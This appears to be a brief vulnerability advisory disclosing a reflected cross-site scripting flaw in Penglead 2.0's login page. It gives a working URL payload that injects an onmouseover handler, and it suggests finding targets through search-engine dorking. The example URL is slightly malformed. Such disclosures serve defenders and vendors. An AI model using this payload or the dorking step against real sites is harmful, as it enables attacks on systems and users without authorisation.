Headline
Penglead 2.0 Cross Site Scripting
Penglead version 2.0 suffers from a cross site scripting vulnerability.
=============================================================================================================================================| # Title : penglead v2.0 XSS Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) || # Vendor : https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /login.php/"onmouseover%3d'prompt(920974)'bad%3d"[+] https://www/127.0.0.1/demo/brokerbaba.buzz/login.php/"onmouseover%3d'prompt(920974)'bad%3d"Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================